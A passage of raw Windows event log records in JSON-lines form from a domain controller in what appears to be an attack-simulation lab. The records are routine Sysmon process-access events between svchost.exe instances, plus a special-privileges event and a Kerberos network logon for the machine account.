06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6984,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220688,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA038C\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa038c","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220689,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA038C\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52730\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa038c","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52730","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6985,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6986,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6987,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6988,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6989,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
